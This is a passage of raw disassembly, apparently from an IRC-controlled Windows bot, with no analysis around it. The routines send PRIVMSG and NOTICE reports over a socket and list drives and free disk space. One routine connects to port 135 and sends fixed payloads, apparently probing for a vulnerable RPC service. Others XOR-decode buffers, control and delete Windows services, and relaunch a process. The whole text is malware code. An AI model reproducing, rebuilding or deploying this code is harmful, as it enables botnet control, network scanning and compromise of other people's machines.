call ds:dword_43ADCC ;; InternetCloseHandle
push [ebp+var_48]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
sub_40CAF1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40CFE3 proc near ; CODE XREF: sub_40CAF1+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40CFFF
loc_40CFEF: ; CODE XREF: sub_40CFE3+1A�j
mov dl, ds:byte_42F5C4
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40CFEF
locret_40CFFF: ; CODE XREF: sub_40CFE3+A�j
retn
sub_40CFE3 endp
; =============== S U B R O U T I N E =======================================
sub_40D000 proc near ; CODE XREF: sub_40EE72+2A7E�p
; sub_40EE72+2BA4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4197F9
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40D000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D01A proc near ; CODE XREF: sub_406387+458�p
; sub_406387+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_43F168
push 0
push edi
call sub_417330
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40D03F: ; CODE XREF: sub_40D01A+5B�j
; sub_40D01A+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4191D0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_419250
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40D07D
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_40D03F
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40D03F
; ---------------------------------------------------------------------------
loc_40D07D: ; CODE XREF: sub_40D01A+4B�j
dec esi
mov eax, edi
loc_40D080: ; CODE XREF: sub_40D01A+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_40D08F
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_40D080
; ---------------------------------------------------------------------------
loc_40D08F: ; CODE XREF: sub_40D01A+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40D01A endp
; =============== S U B R O U T I N E =======================================
sub_40D099 proc near ; CODE XREF: sub_40D24E+51�p
; sub_40D24E+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_43ADF8 ;; GetDriveTypeA
sub eax, 0
jz short loc_40D0DC
dec eax
jz short loc_40D0D6
dec eax
dec eax
jz short loc_40D0D0
dec eax
jz short loc_40D0CA
dec eax
jz short loc_40D0C4
dec eax
jz short loc_40D0BE
mov eax, offset word_42DDD0
retn
; ---------------------------------------------------------------------------
loc_40D0BE: ; CODE XREF: sub_40D099+1D�j
mov eax, offset off_42E644
retn
; ---------------------------------------------------------------------------
loc_40D0C4: ; CODE XREF: sub_40D099+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40D0CA: ; CODE XREF: sub_40D099+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40D0D0: ; CODE XREF: sub_40D099+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40D0D6: ; CODE XREF: sub_40D099+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40D0DC: ; CODE XREF: sub_40D099+D�j
mov eax, offset aUnknown_0 ; "Unknown"
retn
sub_40D099 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D0E2 proc near ; CODE XREF: sub_40D12A+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_43AC94
test eax, eax
jz short loc_40D117
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40D117: ; CODE XREF: sub_40D0E2+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D0E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D12A proc near ; CODE XREF: sub_40B8D8+1F3�p
; sub_40D24E+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_40D0E2
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40D208
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40D208
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40D208
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41782A
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41782A
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41782A
add esp, 10h
pop ebx
jmp short loc_40D23A
; ---------------------------------------------------------------------------
loc_40D208: ; CODE XREF: sub_40D12A+2C�j
; sub_40D12A+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi
push eax
call sub_4172B0
pop ecx
pop ecx
loc_40D23A: ; CODE XREF: sub_40D12A+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D12A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D24E proc near ; CODE XREF: sub_40D320+17�p
; sub_40D320+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40D12A
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_4176D0
add esp, 10h
test eax, eax
jnz short loc_40D2C1
push ebx
push ebx
call sub_40D099
pop ecx
push eax
push offset unk_42E6A4
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41782A
add esp, 14h
jmp short loc_40D2F5
; ---------------------------------------------------------------------------
loc_40D2C1: ; CODE XREF: sub_40D24E+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40D099
pop ecx
push eax
push offset unk_42E658
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41782A
add esp, 20h
loc_40D2F5: ; CODE XREF: sub_40D24E+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_500]
push eax
call sub_40BF6D
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40D24E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D320 proc near ; CODE XREF: sub_40EE72+57F0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40D341
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D24E
add esp, 10h
jmp short loc_40D3A2
; ---------------------------------------------------------------------------
loc_40D341: ; CODE XREF: sub_40D320+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_43AD08 ;; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_417B89
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_43AD08 ;; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40D399
loc_40D365: ; CODE XREF: sub_40D320+77�j
push offset aA_0 ; "A:\\"
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40D388
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D24E
add esp, 10h
loc_40D388: ; CODE XREF: sub_40D320+54�j
push esi
call sub_417AB0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_40D365
loc_40D399: ; CODE XREF: sub_40D320+43�j
push edi
call sub_417C3B
pop ecx
pop edi
pop esi
loc_40D3A2: ; CODE XREF: sub_40D320+1F�j
pop ebx
pop ebp
retn
sub_40D320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D3A5 proc near ; DATA XREF: sub_40E6A9+11�o
var_2A4 = dword ptr -2A4h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_4407FC
call ds:dword_43AE30 ;; closesocket
call sub_416F25
call ds:dword_43ACF8 ;; WSACleanup
call ds:dword_43ACF8 ;; WSACleanup
mov ebx, ds:dword_424064
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_417330
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_436EDC
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_424068 ;; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:off_424094
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_424120 ;; CreateProcessA
test eax, eax
jz short loc_40D46A
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:off_424078
call esi ; sub_4E03D5
push [ebp+var_C]
call esi ; sub_4E03D5
loc_40D46A: ; CODE XREF: sub_40D3A5+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_43F1A0
mov eax, [esp+2A4h+var_2A4]
mov large fs:0, eax
add esp, 8
push edi
call ds:off_42414C
pop edi
pop esi
pop ebx
sub_40D3A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D48D proc near ; CODE XREF: sub_40D4C5+125�p
; sub_40D4C5+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40D4BB
loc_40D49E: ; CODE XREF: sub_40D48D+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4198F0
add esp, 0Ch
test eax, eax
jz short loc_40D4C1
inc esi
cmp esi, edi
jl short loc_40D49E
loc_40D4BB: ; CODE XREF: sub_40D48D+F�j
xor al, al
loc_40D4BD: ; CODE XREF: sub_40D48D+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40D4C1: ; CODE XREF: sub_40D48D+27�j
mov al, 1
jmp short loc_40D4BD
sub_40D48D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4C5 proc near ; CODE XREF: sub_402DD7+8B�p
; sub_402DD7+174�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_417B30
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_40D506
dec eax
jz short loc_40D4E4
dec eax
loc_40D4DE: ; CODE XREF: sub_40D4C5+57�j
xor eax, eax
loc_40D4E0: ; CODE XREF: sub_40D4C5+3F�j
; sub_40D4C5+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40D4E4: ; CODE XREF: sub_40D4C5+16�j
push 3
push 1388h
push [ebp+arg_0]
call ds:dword_43ADD8 ;; inet_addr
push eax
call sub_4076CA
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_40D4E0
; ---------------------------------------------------------------------------
loc_40D506: ; CODE XREF: sub_40D4C5+13�j
push 6
push 1
push 2
call ds:dword_43AE18 ;; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_40D4DE
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call ds:dword_43AD98 ;; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40ADCA
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43AD40 ;; connect
cmp eax, edi
jz loc_40D622
push ebx
push 48h
push offset dword_42E6F4
push esi
call ds:dword_43ADE8 ;; send
cmp eax, edi
jz loc_40D622
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call ds:dword_43ADB0 ;; recv
cmp eax, edi
jz loc_40D622
cmp [ebp+var_200E], 0Ch
jnz short loc_40D622
push ebx
push 18h
push offset dword_42E740
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
cmp eax, edi
jz short loc_40D622
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call ds:dword_43ADB0 ;; recv
mov esi, eax
cmp esi, edi
jz short loc_40D622
cmp [ebp+var_200E], 2
jnz short loc_40D622
push 10h
push offset loc_42E75C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40D48D
add esp, 10h
test al, al
jz short loc_40D602
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_40D622
; ---------------------------------------------------------------------------
loc_40D602: ; CODE XREF: sub_40D4C5+12F�j
push 10h
push offset dword_42E770
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40D48D
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_40D622: ; CODE XREF: sub_40D4C5+9B�j
; sub_40D4C5+B2�j ...
push [ebp+arg_4]
call ds:dword_43AE30 ;; closesocket
mov eax, ebx
pop ebx
jmp loc_40D4E0
sub_40D4C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D633 proc near ; CODE XREF: sub_40ECFA+3D�p
; sub_40EE72+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_4193FF
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
leave
retn
sub_40D633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D679 proc near ; CODE XREF: sub_401000+8B�p
; sub_40144A+76�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_40D694
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_40D694: ; CODE XREF: sub_40D679+14�j
push edi
call sub_417AB0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_417AB0
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_3 ; "%s"
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_42E784
push eax
call sub_4172B0
add esp, 14h
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40D717
push 7D0h
call ds:dword_424064 ;; Sleep
locret_40D717: ; CODE XREF: sub_40D679+91�j
leave
retn
sub_40D679 endp
; =============== S U B R O U T I N E =======================================
sub_40D719 proc near ; CODE XREF: sub_40EE72:loc_410F84�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40D771
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push ds:dword_42E7A8[esi]
push edi
push eax
call sub_40D793
add esp, 14h
test eax, eax
jnz short loc_40D761
push edi
push ds:off_42E7A4[esi]
push offset dword_42E8D4
loc_40D751: ; CODE XREF: sub_40D719+56�j
mov esi, offset dword_43F868
push esi
call sub_4172B0
add esp, 10h
jmp short loc_40D78E
; ---------------------------------------------------------------------------
loc_40D761: ; CODE XREF: sub_40D719+2A�j
push eax
call sub_40D835
pop ecx
push eax
push edi
push offset dword_42E89C
jmp short loc_40D751
; ---------------------------------------------------------------------------
loc_40D771: ; CODE XREF: sub_40D719+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_43F868
push ds:off_42E7A0[eax*4]
push offset dword_42E868
push esi
call sub_4172B0
add esp, 0Ch
loc_40D78E: ; CODE XREF: sub_40D719+46�j
mov eax, esi
pop edi
pop esi
retn
sub_40D719 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D793 proc near ; CODE XREF: sub_40D719+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_43AD8C ;; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_40D7BA
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40D82F
; ---------------------------------------------------------------------------
loc_40D7BA: ; CODE XREF: sub_40D793+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_43AC80 ;; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40D7DA
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40D827
; ---------------------------------------------------------------------------
loc_40D7DA: ; CODE XREF: sub_40D793+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40D80D
cmp eax, 3
jz short loc_40D7FE
jle short loc_40D820
cmp eax, 6
jg short loc_40D820
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_43ACE8 ;; ControlService
jmp short loc_40D814
; ---------------------------------------------------------------------------
loc_40D7FE: ; CODE XREF: sub_40D793+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_43AC88 ;; StartServiceA
jmp short loc_40D814
; ---------------------------------------------------------------------------
loc_40D80D: ; CODE XREF: sub_40D793+4D�j
push esi
call ds:dword_43ACEC ;; DeleteService
loc_40D814: ; CODE XREF: sub_40D793+69�j
; sub_40D793+78�j
test eax, eax
jnz short loc_40D820
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ebx, eax
loc_40D820: ; CODE XREF: sub_40D793+54�j
; sub_40D793+59�j ...
push esi
call ds:dword_43AC9C ;; CloseServiceHandle
loc_40D827: ; CODE XREF: sub_40D793+45�j
push edi
call ds:dword_43AC9C ;; CloseServiceHandle
pop esi
loc_40D82F: ; CODE XREF: sub_40D793+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40D793 endp
; =============== S U B R O U T I N E =======================================
sub_40D835 proc near ; CODE XREF: sub_40D719+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40D8EA
jz loc_40D8E3
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40D8AD
jz short loc_40D8A3
mov ecx, eax
sub ecx, 3
jz short loc_40D899
dec ecx
dec ecx
jz short loc_40D88F
dec ecx
jz short loc_40D885
sub ecx, 51h
jz short loc_40D87B
sub ecx, 24h
jnz loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D87B: ; CODE XREF: sub_40D835+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D885: ; CODE XREF: sub_40D835+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D88F: ; CODE XREF: sub_40D835+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D899: ; CODE XREF: sub_40D835+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8A3: ; CODE XREF: sub_40D835+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8AD: ; CODE XREF: sub_40D835+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40D8DC
dec ecx
jz short loc_40D8D5
dec ecx
jz short loc_40D8CE
dec ecx
jnz loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8CE: ; CODE XREF: sub_40D835+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8D5: ; CODE XREF: sub_40D835+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8DC: ; CODE XREF: sub_40D835+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8E3: ; CODE XREF: sub_40D835+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8EA: ; CODE XREF: sub_40D835+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
jz short loc_40D94D
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_40D9A1[ecx]
jmp off_40D979[ecx*4] ; switch jump
loc_40D90E: ; DATA XREF: _0:off_40D979�o
push offset aTheSpecifiedDa ; jumptable 0040D907 case 7
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D915: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceDepe ; jumptable 0040D907 case 17
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D91C: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceDe_0 ; jumptable 0040D907 case 10
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D923: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHasB ; jumptable 0040D907 case 0
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D92A: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheSpecified_0 ; jumptable 0040D907 case 2
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D931: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceCoul ; jumptable 0040D907 case 11
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D938: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHa_0 ; jumptable 0040D907 case 14
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D93F: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheRequested_1 ; jumptable 0040D907 case 3
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D946: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHasN ; jumptable 0040D907 case 4
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D94D: ; CODE XREF: sub_40D835+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_40D952: ; CODE XREF: sub_40D835+41�j
; sub_40D835+4B�j ...
push offset dword_43F1A8
call sub_4172B0
pop ecx
pop ecx
jmp short loc_40D973
; ---------------------------------------------------------------------------
loc_40D960: ; CODE XREF: sub_40D835+36�j
; sub_40D835+89�j ...
push eax ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_43F1A8
call sub_4172B0
add esp, 0Ch
loc_40D973: ; CODE XREF: sub_40D835+129�j
mov eax, offset dword_43F1A8
retn
sub_40D835 endp
; ---------------------------------------------------------------------------
off_40D979 dd offset loc_40D923 ; DATA XREF: sub_40D835+D2�r
dd offset loc_40D92A ; jump table for switch statement
dd offset loc_40D93F
dd offset loc_40D946
dd offset loc_40D90E
dd offset loc_40D91C
dd offset loc_40D931
dd offset loc_40D938
dd offset loc_40D915
dd offset loc_40D960
byte_40D9A1 db 0, 9, 1, 2 ; DATA XREF: sub_40D835+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9B3 proc near ; CODE XREF: sub_40EE72+2094�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_43AD8C ;; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
